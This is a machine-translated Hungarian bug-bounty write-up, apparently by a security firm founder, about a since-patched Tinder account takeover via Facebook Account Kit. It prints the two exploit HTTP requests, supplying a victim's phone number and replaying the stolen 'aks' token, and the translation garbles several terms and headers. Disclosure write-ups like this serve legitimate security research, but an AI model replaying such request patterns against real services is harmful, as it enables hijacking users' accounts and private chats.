Hogyan hackeltem a Tinder-fiókokat a Facebook Account Kit segítségével, és 6250 dollárt kerestem fejenként

Ezt a Facebook engedélyével teszik közzé a felelős nyilvánosságra hozatali irányelvek szerint.

Az ebben a blogbejegyzésben említett sebezhetőségeket a Facebook és a Tinder mérnöki csapatai gyorsan betörték.

Ez a bejegyzés egy fiók-átvételi biztonsági résről szól, amelyet a Tinder alkalmazásában fedeztem fel. Ennek kihasználásával egy támadó hozzáférhetett az áldozat Tinder-fiókjához, aki a telefonszámát használta a bejelentkezéshez.

Ezt kihasználhatta a Facebook Account Kit biztonsági rése, amelyet a Facebook nemrégiben megoldott.

A Tinder internetes és mobilalkalmazásai lehetővé teszik a felhasználók számára, hogy mobiltelefonszámukkal belépjenek a szolgáltatásba. Ezt a bejelentkezési szolgáltatást pedig a Account Kit (Facebook) biztosítja.

A felhasználó rákattint a Bejelentkezés a telefonszámmal oldalon a tinder.com oldalon, majd átirányítja a Accountkit.com webhelyre bejelentkezés céljából. Ha a hitelesítés sikeres, akkor a Account Kit átadja a hozzáférési tokent a Tinder-nek bejelentkezéshez.

Érdekes módon a Tinder API nem ellenőrizte az ügyfél-azonosítót a Account Kit által biztosított tokenen.

Ez lehetővé tette a támadó számára, hogy a Account Kit által biztosított bármely más alkalmazás hozzáférési jogkivonatát átvegye a többi felhasználó valódi Tinder-fiókjaira.

A biztonsági rés leírása

A Account Kit a Facebook olyan terméke, amely lehetővé teszi az emberek számára, hogy jelszavuk nélkül gyorsan regisztrálhassanak és regisztrálhassanak egyes regisztrált alkalmazásokba, csak telefonszámuk vagy e-mail címük használatával. Megbízható, könnyen használható, és lehetőséget ad a felhasználónak arra, hogy miként regisztráljon az alkalmazásokra.

A Tinder egy helyalapú mobilalkalmazás új emberek keresésére és megismerésére. Lehetővé teszi a felhasználók számára, hogy kedveljék vagy ne kedveljék más felhasználókat, majd folytassanak egy csevegést, ha mindkét fél jobbra csúsztatta.

A fiókkészletben volt egy biztonsági rés, amely révén a támadó hozzáférhetett bármely felhasználó fiókkészlet-fiókjához, csupán telefonszámának felhasználásával. A támadó belekerülhetett a felhasználói fiókkészlet-hozzáférési tokenbe, amely a sütikben található.

Ezt követően a támadó a hozzáférési token (aks) segítségével bejelentkezhet a felhasználó Tinder-fiókjába egy sebezhető API segítségével.

Hogyan működött lépésről lépésre a kizsákmányolásom

1. lépés

Először a támadó bejelentkezett az áldozat Account Kit fiókjába azáltal, hogy beírta az áldozat telefonszámát az „ új_telefon_számmezőbe az alább látható API kérésben.

Felhívjuk figyelmét, hogy a Account Kit nem ellenőrizte a telefonszámok leképezését egyszeri jelszavukkal. A támadó megadhatja bárki telefonszámát, majd egyszerűen bejelentkezhet az áldozat Account Kit fiókjába.

Ezután a támadó átmásolhatja az áldozat Account Kit alkalmazás „aks” hozzáférési tokenjét a sütikből.

A sérülékeny Account Kit API:

POST / update / async / phone / confirm /? Dpr = 2 HTTP / 1.1 Host: www.accountkit.com new_phone_number = [vctim telefonszáma] & update_request_code = c1fb2e919bb33a076a7c6fe4a9fbfa97 [támadó kérési kódja] & confirmation_code = 258822_ [felhasználó = 0 = támadó kódja & 1 & __ dyn = & __ req = 6 & __ be = -1 & __ pc = FÁZIS% 3ADEFAULT & __ rev = 3496767 & fb_dtsg = & jazoest =

2. lépés

Most a támadó egyszerűen visszajátssza a következő kérést az áldozat átmásolt hozzáférési tokenjének „aks” használatával az alábbi Tinder API-ba.

Be lesz jelentkezve az áldozat Tinder számlájára. A támadónak ekkor alapvetően teljes ellenőrzése lenne az áldozat számláján. Olvashattak privát csevegéseket, teljes személyes adatokat, és többek között balra vagy jobbra csúsztathatták a többi felhasználó profilját.

Sebezhető Tinder API:

POST / v2 / auth / login / accountkit? Locale = hu HTTP / 1.1

Házigazda: api.gotinder.com

Csatlakozás: zár

Tartalom-hossz: 185

Származás: //tinder.com

alkalmazásverzió: 1000000

platform: web

Felhasználó-ügynök: Mozilla / 5.0 (Macintosh)

content-type: alkalmazás / json

Elfogad: */*

Referer: //tinder.com/

Elfogadás-kódolás: gzip, deflate

Elfogadási nyelv: en-USA, en; q = 0,9

{“Token”: ”xxx”, “id”: ””}

Video bizonyíték koncepció

Idővonal

A sebezhetőségeket a Tinder és a Facebook gyorsan kijavította. A Facebook 5000 dollárral jutalmazott, a Tinder pedig 1250 dollárral.

Alapítója vagyok az AppSecure-nek, amely egy speciális kiberbiztonsági vállalat, több éves tapasztalattal és aprólékos szakértelemmel. Azért vagyunk itt, hogy megvédjük üzleti és kritikus adatait az online és offline fenyegetések vagy sebezhetőségek ellen.

Vegye fel velünk a kapcsolatot az [email protected] vagy [email protected] címen.